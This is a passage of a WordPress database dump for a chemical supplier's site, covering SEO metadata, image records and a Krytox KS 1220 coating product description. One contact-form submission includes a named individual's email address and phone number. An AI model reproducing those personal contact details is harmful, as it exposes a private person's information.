INSERT INTO `wp_postmeta` VALUES (22792, 2442, '_yoast_wpseo_focuskw', 'Food Grade Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (22793, 2442, '_yoast_wpseo_title', 'Krytox™ NSF H-1 Food Grade Lubricants - Incidental Food Contact'); 
INSERT INTO `wp_postmeta` VALUES (22794, 2442, '_yoast_wpseo_metadesc', 'Choosing the right lubricant for your equipment just got a lot easier with H-1 certified Krytox food grade lubricants from Miller-Stephenson.'); 
INSERT INTO `wp_postmeta` VALUES (22795, 2442, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22796, 2442, '_yoast_wpseo_focuskeywords', '[{"keyword":"Food Grade","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (22797, 2442, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (22799, 2442, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (22801, 1677, '_wp_old_slug', 'ms-122ad'); 
INSERT INTO `wp_postmeta` VALUES (22802, 1677, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22803, 1677, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22804, 1677, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (22805, 1677, '_yoast_wpseo_focuskw_text_input', 'Dry Film PTFE release agent'); 
INSERT INTO `wp_postmeta` VALUES (22806, 1677, '_yoast_wpseo_focuskw', 'Dry Film PTFE release agent'); 
INSERT INTO `wp_postmeta` VALUES (22807, 1677, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (22808, 1677, '_yoast_wpseo_focuskeywords', '[{"keyword":"MS-122AD","score":"good"},{"keyword":"dry lubricant","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (22810, 1677, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (22811, 2450, '_edit_lock', '1476301699:2'); 
INSERT INTO `wp_postmeta` VALUES (22812, 2450, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (22813, 2450, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (22814, 2450, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22815, 2450, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (22816, 2450, '_yoast_wpseo_focuskw_text_input', 'noise'); 
INSERT INTO `wp_postmeta` VALUES (22817, 2450, '_yoast_wpseo_focuskw', 'noise'); 
INSERT INTO `wp_postmeta` VALUES (22818, 2450, '_yoast_wpseo_title', 'Automotive Noise, Vibration, and Harshness Krytox Lubricants'); 
INSERT INTO `wp_postmeta` VALUES (22819, 2450, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22820, 2450, '_yoast_wpseo_focuskeywords', '[{"keyword":"vibration","score":"na"},{"keyword":"harshness","score":"na"}]'); 
INSERT INTO `wp_postmeta` VALUES (22821, 2450, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (22822, 2452, '_wp_attached_file', '2016/10/noise-vibration-harshness.jpg'); 
INSERT INTO `wp_postmeta` VALUES (22823, 2452, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:810;s:6:"height";i:461;s:4:"file";s:37:"2016/10/noise-vibration-harshness.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:37:"noise-vibration-harshness-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:37:"noise-vibration-harshness-800x455.jpg";s:5:"width";i:800;s:6:"height";i:455;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:37:"noise-vibration-harshness-768x437.jpg";s:5:"width";i:768;s:6:"height";i:437;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:37:"noise-vibration-harshness-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:37:"noise-vibration-harshness-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:37:"noise-vibration-harshness-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:37:"noise-vibration-harshness-510x461.jpg";s:5:"width";i:510;s:6:"height";i:461;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"7";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (22824, 2453, '_wp_attached_file', '2016/10/shutterstock_420231835.jpg'); 
INSERT INTO `wp_postmeta` VALUES (22825, 2453, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6549;s:6:"height";i:4366;s:4:"file";s:34:"2016/10/shutterstock_420231835.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_420231835-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_420231835-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_420231835-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_420231835-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_420231835-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_420231835-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_420231835-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_420231835-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (22826, 2450, '_thumbnail_id', '2453'); 
INSERT INTO `wp_postmeta` VALUES (22828, 2450, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (22829, 2450, 'ninja_forms_form', '1'); 
INSERT INTO `wp_postmeta` VALUES (22830, 2450, '_yoast_wpseo_metadesc', 'Krytox™ Lubricants Can Help Solve Your Automotive Noise, Vibration, and Harshness issues with the help of Miller-Stephenson.'); 
INSERT INTO `wp_postmeta` VALUES (22831, 2450, '_yoast_wpseo_linkdex', '97'); 
INSERT INTO `wp_postmeta` VALUES (22836, 2458, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (22837, 2458, '_seq_num', '42'); 
INSERT INTO `wp_postmeta` VALUES (22838, 2458, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22839, 2458, '_field_1', 'Craig Finn'); 
INSERT INTO `wp_postmeta` VALUES (22840, 2458, '_field_10', 'Lucite International'); 
INSERT INTO `wp_postmeta` VALUES (22841, 2458, '_field_2', 'craig.finn@lucite.com'); 
INSERT INTO `wp_postmeta` VALUES (22842, 2458, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (22843, 2458, '_field_3', 'We purchase Vazo 64 from you in the USA. Please send a current status REACH statement for this product. Many Thanks\nCraig Finn\nProduct Regulatory Manager\n+44(0)1642 447167'); 
INSERT INTO `wp_postmeta` VALUES (22844, 2458, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (22845, 2458, '_sub_id', '2458'); 
INSERT INTO `wp_postmeta` VALUES (22847, 1268, '_oembed_b2e62e73360443f19c18b780bde1f1cd', '<blockquote data-secret="fQnCNXoJSF" class="wp-embedded-content"><a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing/">Opteon™ Sion for Vapor Degreasing</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" src="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing/embed/#?secret=fQnCNXoJSF" data-secret="fQnCNXoJSF" width="600" height="338" title="&#8220;Opteon™ Sion for Vapor Degreasing&#8221; &#8212; Miller-Stephenson Chemicals" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>'); 
INSERT INTO `wp_postmeta` VALUES (22848, 1268, '_oembed_time_b2e62e73360443f19c18b780bde1f1cd', '1476115013'); 
INSERT INTO `wp_postmeta` VALUES (22849, 1276, '_oembed_b2e62e73360443f19c18b780bde1f1cd', '<blockquote data-secret="3W0ZQprx1C" class="wp-embedded-content"><a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing/">Opteon™ Sion for Vapor Degreasing</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" src="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing/embed/#?secret=3W0ZQprx1C" data-secret="3W0ZQprx1C" width="600" height="338" title="&#8220;Opteon™ Sion for Vapor Degreasing&#8221; &#8212; Miller-Stephenson Chemicals" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>'); 
INSERT INTO `wp_postmeta` VALUES (22850, 1276, '_oembed_time_b2e62e73360443f19c18b780bde1f1cd', '1476115087'); 
INSERT INTO `wp_postmeta` VALUES (22851, 2226, '_oembed_b2e62e73360443f19c18b780bde1f1cd', '<blockquote data-secret="QPoq3MDZRl" class="wp-embedded-content"><a href="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing/">Opteon™ Sion for Vapor Degreasing</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; clip: rect(1px, 1px, 1px, 1px);" src="https://www.miller-stephenson.com/opteon-sion-vapor-degreasing/embed/#?secret=QPoq3MDZRl" data-secret="QPoq3MDZRl" width="600" height="338" title="&#8220;Opteon™ Sion for Vapor Degreasing&#8221; &#8212; Miller-Stephenson Chemicals" frameborder="0" marginwidth="0" marginheight="0" scrolling="no"></iframe>'); 
INSERT INTO `wp_postmeta` VALUES (22852, 2226, '_oembed_time_b2e62e73360443f19c18b780bde1f1cd', '1476115134'); 
INSERT INTO `wp_postmeta` VALUES (22853, 2226, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (22854, 302, '_yoast_wpseo_linkdex', '96'); 
INSERT INTO `wp_postmeta` VALUES (22855, 1520, '_wp_attachment_image_alt', 'Universal PTFE Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (22856, 2460, '_edit_lock', '1492616956:2'); 
INSERT INTO `wp_postmeta` VALUES (22857, 2460, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (22858, 305, '_wp_old_slug', 'ms-143ax'); 
INSERT INTO `wp_postmeta` VALUES (22859, 305, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22860, 305, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22861, 305, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (22862, 305, '_yoast_wpseo_focuskw_text_input', 'Universal PTFE Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (22863, 305, '_yoast_wpseo_focuskw', 'Universal PTFE Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (22864, 305, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (22865, 305, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (22866, 2461, '_wp_attached_file', '2016/10/KS-1220-Treatment.jpg'); 
INSERT INTO `wp_postmeta` VALUES (22867, 2461, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:269;s:6:"height";i:452;s:4:"file";s:29:"2016/10/KS-1220-Treatment.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:29:"KS-1220-Treatment-269x340.jpg";s:5:"width";i:269;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:29:"KS-1220-Treatment-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:29:"KS-1220-Treatment-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:29:"KS-1220-Treatment-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (22868, 2462, '_wp_attached_file', '2016/10/ks-1220-beads.jpg'); 
INSERT INTO `wp_postmeta` VALUES (22869, 2462, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1050;s:6:"height";i:406;s:4:"file";s:25:"2016/10/ks-1220-beads.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"ks-1220-beads-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:25:"ks-1220-beads-800x309.jpg";s:5:"width";i:800;s:6:"height";i:309;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"ks-1220-beads-768x297.jpg";s:5:"width";i:768;s:6:"height";i:297;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:25:"ks-1220-beads-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"ks-1220-beads-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"ks-1220-beads-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:25:"ks-1220-beads-510x406.jpg";s:5:"width";i:510;s:6:"height";i:406;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (22870, 2463, '_wp_attached_file', '2016/10/shutterstock_84131626.jpg'); 
INSERT INTO `wp_postmeta` VALUES (22871, 2463, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3044;s:6:"height";i:2022;s:4:"file";s:33:"2016/10/shutterstock_84131626.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_84131626-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_84131626-800x531.jpg";s:5:"width";i:800;s:6:"height";i:531;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_84131626-768x510.jpg";s:5:"width";i:768;s:6:"height";i:510;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_84131626-1600x1063.jpg";s:5:"width";i:1600;s:6:"height";i:1063;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_84131626-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_84131626-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_84131626-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_84131626-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (22872, 2460, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (22873, 2460, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (22874, 2460, '_thumbnail_id', '2463'); 
INSERT INTO `wp_postmeta` VALUES (22875, 2460, '312_default_editor', 'Krytox KS 1220 Performance\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong>Measure Type</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Unit</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Krytox KS 1220</strong></td>\r\n<td style="text-align: center;" width="206"><strong>(6+2)Rf-silane<sup>5</sup></strong></td>\r\n<td style="text-align: center;" width="206"><strong>Untreated Glass</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Water Contact Angle</td>\r\n<td style="text-align: center;">°</td>\r\n<td style="text-align: center;">117</td>\r\n<td style="text-align: center;">84</td>\r\n<td style="text-align: center;">14</td>\r\n</tr>\r\n<tr>\r\n<td>Water Roll-Off</td>\r\n<td style="text-align: center;">°</td>\r\n<td style="text-align: center;">12</td>\r\n<td style="text-align: center;">17</td>\r\n<td style="text-align: center;">-</td>\r\n</tr>\r\n<tr>\r\n<td>Oil Contact Angle</td>\r\n<td style="text-align: center;">°</td>\r\n<td style="text-align: center;">73</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">&lt;10</td>\r\n</tr>\r\n<tr>\r\n<td>Oil Roll-Off Angle</td>\r\n<td style="text-align: center;">°</td>\r\n<td style="text-align: center;">4</td>\r\n<td style="text-align: center;">6</td>\r\n<td style="text-align: center;">-</td>\r\n</tr>\r\n<tr>\r\n<td>Coefficient of Friction</td>\r\n<td></td>\r\n<td style="text-align: center;">0.15</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n</tr>\r\n<tr>\r\n<td>Abrasion¹</td>\r\n<td style="text-align: center;">Cycles</td>\r\n<td style="text-align: center;">&gt;3000</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n</tr>\r\n<tr>\r\n<td>Thermal Resistance²</td>\r\n<td style="text-align: center;">°</td>\r\n<td style="text-align: center;">&gt;110</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n</tr>\r\n<tr>\r\n<td>Chemical Resistance³</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Great</td>\r\n<td style="text-align: center;">Good</td>\r\n<td style="text-align: center;">Poor</td>\r\n</tr>\r\n<tr>\r\n<td>Anti-Smudge*</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Excellent</td>\r\n<td style="text-align: center;">Okay</td>\r\n<td style="text-align: center;">Poor</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Surface Energy</td>\r\n<td style="text-align: center;">mJ/m^2</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">33</td>\r\n<td style="text-align: center;">72</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n¹Water contact angle exceeds 100° using a TABER® linear abraser with #0000 steel wool and 1 kg/cm2 of force\r\n²Water contact angle after 9 days of exposure at 200 °C (392 °F)\r\n³Maintained contact angle &gt;110° after 24 hr soak in various household cleaners (pH &lt;11)\r\n*Qualitative wipe test\r\n<sup>5</sup>(Tridecafluoro-1,1,2,2-tetrahydrooctyl)trimethoxysilane; CAS No. 85857-16-5'); 
INSERT INTO `wp_postmeta` VALUES (22876, 2460, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22877, 2460, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22878, 2460, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22879, 2460, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22880, 2460, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22881, 2460, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (22882, 2460, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (22883, 2460, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (22884, 2460, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (22885, 2460, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (22886, 2460, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22887, 2460, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22888, 2460, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (22889, 2460, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22890, 2460, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (22891, 2460, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (22892, 2460, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (22893, 2460, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (22894, 2460, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (22895, 2460, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (22896, 2460, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (22897, 2460, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (22898, 2460, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (22899, 2460, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (22900, 2460, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (22901, 2460, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (22902, 2460, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22903, 2460, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22904, 2460, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (22905, 2460, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (22906, 2460, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (22907, 2460, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (22908, 2460, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22909, 2460, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22910, 2460, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (22911, 2460, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (22912, 2460, '_ywtm_content_tab_description', 'Krytox KS 1220 functional polymer is an innovative perfluoropolyether (PFPE) alkoxysilane developed by Chemours. It takes advantage of the technology behind Krytox performance lubricants to impart anti-smudge, antifouling, and easy-clean properties to a variety of surfaces. The unique chemical structure of Krytox KS 1220 provides treated substrates with excellent oil and water repellency, as well as low coefficient of friction. As a result, surfaces treated with Krytox KS 1220 exhibit a smooth feel and are scratch-resistant. Krytox KS 1220 is an ideal easy-clean coating solution for maintaining the appearance and integrity\r\nof highly manipulated surfaces, such as touch panel displays, cover glass, optical lenses, and metal casings.\r\n\r\n<strong>Properties</strong>\r\n<ul>\r\n 	<li>Hydrophobic and oleophobic</li>\r\n 	<li>Abrasion resistance</li>\r\n 	<li>Low coefficient of friction</li>\r\n 	<li>Chemically stable in non-alkali cleaners</li>\r\n 	<li>Durable and transparent</li>\r\n 	<li>Thermal and UV resistance</li>\r\n</ul>\r\n<strong>Application Methods</strong>\r\n\r\nKrytox KS 1220 functional polymer can be applied by dip coating, spray, or physical vapor deposition (PVD) methods. In general, spray coating is recommended, because it allows the coating procedure to be amenable for a continuous process. The thermal stability of Krytox KS 1220, and its ability to moisture cure, permits a wide range of curing conditions.\r\n\r\n<strong>Preparing a Surface</strong>\r\n\r\nAn activated surface with reactive, ideally hydroxyl, functionality is necessary for Krytox KS 1220 to chemically bind to the substrate. Therefore, thorough cleaning and activation of the surface to be coated is critical for the proper performance of Krytox KS 1220. Without proper cleaning, surface contamination may impede chemical binding and negatively impact the product’s performance. When necessary, plasma or ion-discharge treatment may be used to activate the surface and enhance the bonding between Krytox KS 1220 and the substrate. Alternatively, chemical and/or physical methods may be necessary, depending on\r\nthe application.\r\n\r\n<img class="size-full wp-image-2461 alignright" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/KS-1220-Treatment.jpg" alt="ks-1220-treatment" width="269" height="452" /><strong>Coating a Surface</strong>\r\n\r\nKrytox KS 1220 functional polymer is typically prepared by diluting the product to 0.1–0.5% by weight with solvents having a boiling range of 50–110 °C (122–230 °F). Solvents suitable for use with KS 1220 include fluorinated fluids, such as Vertrel XF and Vertrel Suprion from Miller-Stephenson. This coating can be applied by dip coating, spraying, or vapor deposition methods.\r\n\r\n<strong>Curing</strong>\r\n\r\nFor optimum surface treatment, KS 1220 functional polymer must chemically bind to the substrate surface through a proper curing process. Thermal curing at 100–150 °C (212–302 °F) for 30–60 min is recommended for most applications. However, temperature and cure times may be varied to achieve optimal performance. Using a lower temperature and longer cure time can be helpful to achieve optimal performance for materials with lower thermal tolerance. Water is required to cure Krytox KS 1220. If surface moisture is not present, a humidity-controlled environment around 50–90% RH should be utilized.\r\n\r\n<strong>Post-Cure Process</strong>\r\n\r\nDepending on the coating method, residual material may be visible on the coated surface. Simply wipe the surface with a lint-free, microfiber cloth until visually clear. Covering the surface with a protective film is recommended for proper storage.\r\n\r\n<strong>Characteristics of KS 1220</strong>\r\n<table width="662">\r\n<tbody>\r\n<tr>\r\n<td width="250"></td>\r\n<td width="206">Unit</td>\r\n<td style="text-align: center;" width="206">Krytox KS 1220</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td></td>\r\n<td style="text-align: center;">Clear Liquid</td>\r\n</tr>\r\n<tr>\r\n<td>Contentration1</td>\r\n<td style="text-align: center;">%</td>\r\n<td style="text-align: center;">20</td>\r\n</tr>\r\n<tr>\r\n<td>Solvent Boiling Point</td>\r\n<td style="text-align: center;">°C</td>\r\n<td style="text-align: center;">55</td>\r\n</tr>\r\n<tr>\r\n<td>pH</td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Neutral</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity2</td>\r\n<td style="text-align: 